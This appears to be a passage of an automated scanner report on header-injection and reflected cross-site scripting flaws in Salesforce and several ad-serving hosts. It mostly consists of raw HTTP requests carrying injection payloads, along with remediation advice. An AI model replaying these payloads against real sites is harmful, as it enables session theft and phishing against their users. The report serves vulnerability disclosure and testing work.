GET /common/assets/thirdparty/pixels/1e04a%0d%0a284c4d986bb?date=101221 HTTP/1.1 Host: www.salesforce.com Proxy-Connection: keep-alive Referer: http://www.salesforce.com/platform/?e9e1f%22%3E%3Cscript%3Ealert(1)%3C/script%3Eca65c1d65e=1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: mbox=check#true#1303485951|session#1303485890745-255084#1303487751; fsr.a=1303485890905; webact=%7B%22l_vdays%22%3A-1%2C%22l_visit%22%3A0%2C%22session%22%3A1303485889743%2C%22l_search%22%3A%22%22%2C%22l_dtype%22%3A%22%22%2C%22l_page%22%3A%22SFDC%3Aus%3Aplatform%22%2C%22counter%22%3A0%2C%22pv%22%3A1%2C%22f_visit%22%3A1303485889743%2C%22version%22%3A%22w170.1%22%2C%22rescoped%22%3Atrue%2C%22db%22%3A%7B%22name%22%3A%22media%20visions%22%2C%22size%22%3A%22vsb%22%2C%22ind%22%3A%22software%20%26%20technology%3Ahigh%20tech%22%7D%7D
The URL has moved to <a href="/common/assets/thirdparty/pixels/1e04a 284c4d986bb/?date=101221">/common/assets/thirdparty/pixels/1e04a 284c4d986bb/?date=101221</a>
The value of REST URL parameter 1 is copied into the Location response header. The payload def3f%0d%0af5e9ff33902 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /def3f%0d%0af5e9ff33902 HTTP/1.1 Host: www.salesforce.com Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: mbox=check#true#1303485951|session#1303485890745-255084#1303487751|PC#1303485890745-255084.17#1304695494; foresee.analytics=%7B%22rr_domain%22%3A%22www.salesforce.com%22%2C%22rr_version%22%3A12.1%2C%22rr_group_id%22%3A%221303485894523_6640%22%7D; fsr.s={"cp":{"siteLocale":"us","visitorType":"anonymous","segment":"non-customer:us","visitorTypeDetailed":"anonymous:no-trial","visitNumber":1,"previousPage":"SFDC:us:platform"}}; webact=%7B%22l_vdays%22%3A-1%2C%22l_visit%22%3A0%2C%22session%22%3A1303485889743%2C%22l_search%22%3A%22%22%2C%22l_dtype%22%3A%22%22%2C%22l_page%22%3A%22SFDC%3Aus%3Aplatform%22%2C%22counter%22%3A0%2C%22pv%22%3A1%2C%22f_visit%22%3A1303485889743%2C%22version%22%3A%22w170.1%22%2C%22rescoped%22%3Atrue%2C%22db%22%3A%7B%22name%22%3A%22media%20visions%22%2C%22size%22%3A%22vsb%22%2C%22ind%22%3A%22software%20%26%20technology%3Ahigh%20tech%22%7D%2C%22bar-expanded%22%3Atrue%7D; s_pers=%20v44%3DExternal%2520Websites%7C3233921094723%3B%20v30%3DExternal%2520Websites%257Cburp%7C3233921094725%3B; s_vi=[CS]v1|26D8CEE5051D3246-60000107A001D614[CE]; fsr.a=1303485904836; s_sess=%20s_ppv_x%3D%3B%20s_cc%3Dtrue%3B%20c16%3Dflash%252010%257C%3B%20nve%3Dnve%3B%20v0%3DExternal%2520Websites%257Cburp%3B%20c22%3DExternal%2520Websites%3B%20v20%3DDirect%2520Landing%3B%20c24%3DExternal%2520Websites%257Cburp%3B%20c40%3DExternal%2520Websites%3B%20c48%3D12751%253A0%253A0%3B%20s_sq%3D%3B%20s_ppv%3D62%257C0%3B
The value of REST URL parameter 1 is copied into the Location response header. The payload a3ace%0d%0a511c6f03f7c was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /a3ace%0d%0a511c6f03f7c?e9e1f%22%3E%3Cscript%3Ealert(1)%3C/script%3Eca65c1d65e=1 HTTP/1.1 Host: www.salesforce.com Proxy-Connection: keep-alive Referer: http://burp/show/2 Cache-Control: max-age=0 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The URL has moved to <a href="/a3ace 511c6f03f7c/?e9e1f%22%3E%3Cscript%3Ealert(1)%3C/script%3Eca65c1d65e=1">/a3ace 511c6f03f7c/?e9e1f%22%3E%3Cscript%3Ealert(1)%3C/script%3Eca65c1d65e=1</a>
The value of REST URL parameter 2 is copied into the Location response header. The payload 50940%0d%0a4462d617d22 was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.
Request
GET /platform/50940%0d%0a4462d617d22 HTTP/1.1 Host: www.salesforce.com Proxy-Connection: keep-alive Referer: http://www.salesforce.com/platform/?e9e1f%22%3E%3Cscript%3Ealert(1)%3C/script%3Eca65c1d65e=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: webact=%7B%22l_vdays%22%3A-1%2C%22l_visit%22%3A0%2C%22session%22%3A1303485889743%2C%22l_search%22%3A%22%22%2C%22l_dtype%22%3A%22%22%2C%22l_page%22%3A%22SFDC%3Aus%3Aplatform%22%2C%22counter%22%3A0%2C%22pv%22%3A1%2C%22f_visit%22%3A1303485889743%2C%22version%22%3A%22w170.1%22%2C%22rescoped%22%3Atrue%2C%22db%22%3A%7B%22name%22%3A%22media%20visions%22%2C%22size%22%3A%22vsb%22%2C%22ind%22%3A%22software%20%26%20technology%3Ahigh%20tech%22%7D%7D; fsr.a=1303485892905; mbox=check#true#1303485951|session#1303485890745-255084#1303487751|PC#1303485890745-255084.17#1304695494
The value of REST URL parameter 3 is copied into the Location response header. The payload 29460%0d%0a27690dcd73b was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.
Request
GET /platform/data/29460%0d%0a27690dcd73b HTTP/1.1 Host: www.salesforce.com Proxy-Connection: keep-alive Referer: http://www.salesforce.com/platform/210x147_rotatingbanner.swf Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: mbox=check#true#1303485951|session#1303485890745-255084#1303487751|PC#1303485890745-255084.17#1304695494; foresee.analytics=%7B%22rr_domain%22%3A%22www.salesforce.com%22%2C%22rr_version%22%3A12.1%2C%22rr_group_id%22%3A%221303485894523_6640%22%7D; fsr.s={"cp":{"siteLocale":"us","visitorType":"anonymous","segment":"non-customer:us","visitorTypeDetailed":"anonymous:no-trial","visitNumber":1,"previousPage":"SFDC:us:platform"}}; webact=%7B%22l_vdays%22%3A-1%2C%22l_visit%22%3A0%2C%22session%22%3A1303485889743%2C%22l_search%22%3A%22%22%2C%22l_dtype%22%3A%22%22%2C%22l_page%22%3A%22SFDC%3Aus%3Aplatform%22%2C%22counter%22%3A0%2C%22pv%22%3A1%2C%22f_visit%22%3A1303485889743%2C%22version%22%3A%22w170.1%22%2C%22rescoped%22%3Atrue%2C%22db%22%3A%7B%22name%22%3A%22media%20visions%22%2C%22size%22%3A%22vsb%22%2C%22ind%22%3A%22software%20%26%20technology%3Ahigh%20tech%22%7D%2C%22bar-expanded%22%3Atrue%7D; s_pers=%20v44%3DExternal%2520Websites%7C3233921094723%3B%20v30%3DExternal%2520Websites%257Cburp%7C3233921094725%3B; s_sess=%20s_ppv%3D0%3B%20s_ppv_x%3D%3B%20s_cc%3Dtrue%3B%20c16%3Dflash%252010%257C%3B%20nve%3Dnve%3B%20v0%3DExternal%2520Websites%257Cburp%3B%20c22%3DExternal%2520Websites%3B%20v20%3DDirect%2520Landing%3B%20c24%3DExternal%2520Websites%257Cburp%3B%20c40%3DExternal%2520Websites%3B%20c48%3D12751%253A0%253A0%3B%20s_sq%3D%3B; fsr.a=1303485895322
Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.
The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.
Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).
The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.
Remediation background
In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:
Input should be validated as strictly as possible on arrival, given the kind of content which it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitised.
User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (< > etc).
In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.
The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 53524'-alert(1)-'3d614a62ce1 was submitted in the sz parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/N3493.intergi.com/B5426713.10;sz=53524'-alert(1)-'3d614a62ce1 HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://ads.intergi.com/adiframe/3.0/5205/1785959/0/170/ADTECH;target=_blank;kvesrb=e:e10:t:m;kvgender=male:female;kvgenre=simulation:adventure:action:shooter:fitness:strategy:sports;kvsite=ubi;grp=[group] User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u; __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 828af<script>alert(1)</script>33df1d10383 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adserver/vdi/684339828af<script>alert(1)</script>33df1d10383?d=4dab7d35-b1d2-915a-d3c0-9d57f9c66b07 HTTP/1.1 Host: ads.adbrite.com Proxy-Connection: keep-alive Referer: http://www.imiclk.com/cgi/r.cgi?m=3&mid=uHyDGHbZ&did=10500 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: Apache="168362049x0.049+1303083450x544669068"; ut="1%3Aq1YqM1KyqlbKTq0szy9KKVayUio2Ki4yrDEsqEzLy6tJrDE0LKlS0lFKSszLSy3KBKtQqq0FAA%3D%3D"; srh="1%3Aq64FAA%3D%3D"; rb2=CiMKBjc0MjY5NxjBmaHVByITMjkzMTE0Mjk2MTY0NjYzNDc3NQo0CgY4MDYyMDUYwMmGmRUiJDBjMmFlZGU2LTZiYjYtMTFlMC04ZmU2LTAwMjU5MDBhOGZmZRAB; vsd=0@1@4db0cb91@searchportal.information.com; rb=0:742697:20828160:2931142961646634775:0:806205:20882880:0c2aede6-6bb6-11e0-8fe6-0025900a8ffe:0
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 85d63"><script>alert(1)</script>ab732276e99 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adiframe85d63"><script>alert(1)</script>ab732276e99/3.0/5205/1785959/0/170/ADTECH;target=_blank;kvesrb=e:e10:t:m;kvgender=male:female;kvgenre=simulation:adventure:action:shooter:fitness:strategy:sports;kvsite=ubi;grp=[group] HTTP/1.1 Host: ads.intergi.com Proxy-Connection: keep-alive Referer: http://www.ubi.com/US/default.aspx User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: CfP=1; JEB2=4DB1980D6E651A440C6EAF39F000ED39
Response
HTTP/1.0 200 OK Connection: close Content-Type: text/html Content-Length: 370
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f0eb2"><script>alert(1)</script>aac0eaedd2a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adiframe/3.0f0eb2"><script>alert(1)</script>aac0eaedd2a/5205/1785959/0/170/ADTECH;target=_blank;kvesrb=e:e10:t:m;kvgender=male:female;kvgenre=simulation:adventure:action:shooter:fitness:strategy:sports;kvsite=ubi;grp=[group] HTTP/1.1 Host: ads.intergi.com Proxy-Connection: keep-alive Referer: http://www.ubi.com/US/default.aspx User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: CfP=1; JEB2=4DB1980D6E651A440C6EAF39F000ED39
Response
HTTP/1.0 200 OK Connection: close Content-Type: text/html Content-Length: 370
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3fc4e"><script>alert(1)</script>33cec00506 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adiframe/3.0/52053fc4e"><script>alert(1)</script>33cec00506/1785959/0/170/ADTECH;target=_blank;kvesrb=e:e10:t:m;kvgender=male:female;kvgenre=simulation:adventure:action:shooter:fitness:strategy:sports;kvsite=ubi;grp=[group] HTTP/1.1 Host: ads.intergi.com Proxy-Connection: keep-alive Referer: http://www.ubi.com/US/default.aspx User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: CfP=1; JEB2=4DB1980D6E651A440C6EAF39F000ED39
Response
HTTP/1.0 200 OK Connection: close Content-Type: text/html Content-Length: 369
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d80c0"><script>alert(1)</script>b217f28c29d was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adiframe/3.0/5205/1785959d80c0"><script>alert(1)</script>b217f28c29d/0/170/ADTECH;target=_blank;kvesrb=e:e10:t:m;kvgender=male:female;kvgenre=simulation:adventure:action:shooter:fitness:strategy:sports;kvsite=ubi;grp=[group] HTTP/1.1 Host: ads.intergi.com Proxy-Connection: keep-alive Referer: http://www.ubi.com/US/default.aspx User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: CfP=1; JEB2=4DB1980D6E651A440C6EAF39F000ED39
Response
HTTP/1.0 200 OK Connection: close Content-Type: text/html Content-Length: 370
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ede19"><script>alert(1)</script>da26e51db9e was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adiframe/3.0/5205/1785959/0ede19"><script>alert(1)</script>da26e51db9e/170/ADTECH;target=_blank;kvesrb=e:e10:t:m;kvgender=male:female;kvgenre=simulation:adventure:action:shooter:fitness:strategy:sports;kvsite=ubi;grp=[group] HTTP/1.1 Host: ads.intergi.com Proxy-Connection: keep-alive Referer: http://www.ubi.com/US/default.aspx User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: CfP=1; JEB2=4DB1980D6E651A440C6EAF39F000ED39
Response
HTTP/1.0 200 OK Connection: close Content-Type: text/html Content-Length: 370
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6c230"><script>alert(1)</script>92df9fceeea was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adiframe/3.0/5205/1785959/0/1706c230"><script>alert(1)</script>92df9fceeea/ADTECH;target=_blank;kvesrb=e:e10:t:m;kvgender=male:female;kvgenre=simulation:adventure:action:shooter:fitness:strategy:sports;kvsite=ubi;grp=[group] HTTP/1.1 Host: ads.intergi.com Proxy-Connection: keep-alive Referer: http://www.ubi.com/US/default.aspx User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: CfP=1; JEB2=4DB1980D6E651A440C6EAF39F000ED39
Response
HTTP/1.0 200 OK Connection: close Content-Type: text/html Content-Length: 370
The value of REST URL parameter 7 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 34c3f"><script>alert(1)</script>68d2fa0cf19 was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adiframe/3.0/5205/1785959/0/170/ADTECH34c3f"><script>alert(1)</script>68d2fa0cf19;target=_blank;kvesrb=e:e10:t:m;kvgender=male:female;kvgenre=simulation:adventure:action:shooter:fitness:strategy:sports;kvsite=ubi;grp=[group] HTTP/1.1 Host: ads.intergi.com Proxy-Connection: keep-alive Referer: http://www.ubi.com/US/default.aspx User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: CfP=1; JEB2=4DB1980D6E651A440C6EAF39F000ED39
Response
HTTP/1.0 200 OK Connection: close Content-Type: text/html Content-Length: 370
3.10. http://ads.intergi.com/adiframe/3.0/5205/1785959/0/170/ADTECH [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://ads.intergi.com
Path:
/adiframe/3.0/5205/1785959/0/170/ADTECH
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1e27a"><script>alert(1)</script>dac7ffab43 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adiframe/3.0/5205/1785959/0/170/ADTECH;target=_blank;kvesrb=e:e10:t:m;kvgender=male:female;kvgenre=simulation:adventure:action:shooter:fitness:strategy:sports;kvsite=ubi;grp=[group]&1e27a"><script>alert(1)</script>dac7ffab43=1 HTTP/1.1 Host: ads.intergi.com Proxy-Connection: keep-alive Referer: http://www.ubi.com/US/default.aspx User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: CfP=1; JEB2=4DB1980D6E651A440C6EAF39F000ED39
Response
HTTP/1.0 200 OK Connection: close Content-Type: text/html Content-Length: 372
The value of the target request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 96362"><script>alert(1)</script>af6646d0ffc was submitted in the target parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adiframe/3.0/5205/1785959/0/170/ADTECH;target=_blank;kvesrb=e:e10:t:m;kvgender=male:female;kvgenre=simulation:adventure:action:shooter:fitness:strategy:sports;kvsite=ubi;grp=[group]96362"><script>alert(1)</script>af6646d0ffc HTTP/1.1 Host: ads.intergi.com Proxy-Connection: keep-alive Referer: http://www.ubi.com/US/default.aspx User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: CfP=1; JEB2=4DB1980D6E651A440C6EAF39F000ED39
Response
HTTP/1.0 200 OK Connection: close Content-Type: text/html Content-Length: 370
The value of the target request parameter is copied into the value of an HTML tag attribute which is not encapsulated in any quotation marks. The payload aabb5><script>alert(1)</script>bdb618d8812 was submitted in the target parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adiframe/3.0/5205/1785959/0/170/ADTECH;target=aabb5><script>alert(1)</script>bdb618d8812 HTTP/1.1 Host: ads.intergi.com Proxy-Connection: keep-alive Referer: http://www.ubi.com/US/default.aspx User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: CfP=1; JEB2=4DB1980D6E651A440C6EAF39F000ED39
Response
HTTP/1.0 200 OK Connection: close Content-Type: text/html Content-Length: 270
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3109b"><script>alert(1)</script>3efc1e6b184 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adiframe3109b"><script>alert(1)</script>3efc1e6b184/3.0/5205/1785960/0/225/ADTECH;target=_blank;kvesrb=e:e10:t:m;kvgender=male:female;kvgenre=simulation:adventure:action:shooter:fitness:strategy:sports;kvsite=ubi:;grp=[group] HTTP/1.1 Host: ads.intergi.com Proxy-Connection: keep-alive Referer: http://www.ubi.com/US/404.aspx?aspxerrorpath=%2fdoubleclick%2fDARTIframe%2Ehtml User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: CfP=1; JEB2=4DB1980D6E651A440C6EAF39F000ED39
Response
HTTP/1.0 200 OK Connection: close Content-Type: text/html Content-Length: 371
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5a297"><script>alert(1)</script>e672ef11e74 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adiframe/3.05a297"><script>alert(1)</script>e672ef11e74/5205/1785960/0/225/ADTECH;target=_blank;kvesrb=e:e10:t:m;kvgender=male:female;kvgenre=simulation:adventure:action:shooter:fitness:strategy:sports;kvsite=ubi:;grp=[group] HTTP/1.1 Host: ads.intergi.com Proxy-Connection: keep-alive Referer: http://www.ubi.com/US/404.aspx?aspxerrorpath=%2fdoubleclick%2fDARTIframe%2Ehtml User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: CfP=1; JEB2=4DB1980D6E651A440C6EAF39F000ED39
Response
HTTP/1.0 200 OK Connection: close Content-Type: text/html Content-Length: 371
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 675dd"><script>alert(1)</script>1f1c87414ca was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adiframe/3.0/5205675dd"><script>alert(1)</script>1f1c87414ca/1785960/0/225/ADTECH;target=_blank;kvesrb=e:e10:t:m;kvgender=male:female;kvgenre=simulation:adventure:action:shooter:fitness:strategy:sports;kvsite=ubi:;grp=[group] HTTP/1.1 Host: ads.intergi.com Proxy-Connection: keep-alive Referer: http://www.ubi.com/US/404.aspx?aspxerrorpath=%2fdoubleclick%2fDARTIframe%2Ehtml User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: CfP=1; JEB2=4DB1980D6E651A440C6EAF39F000ED39
Response
HTTP/1.0 200 OK Connection: close Content-Type: text/html Content-Length: 371
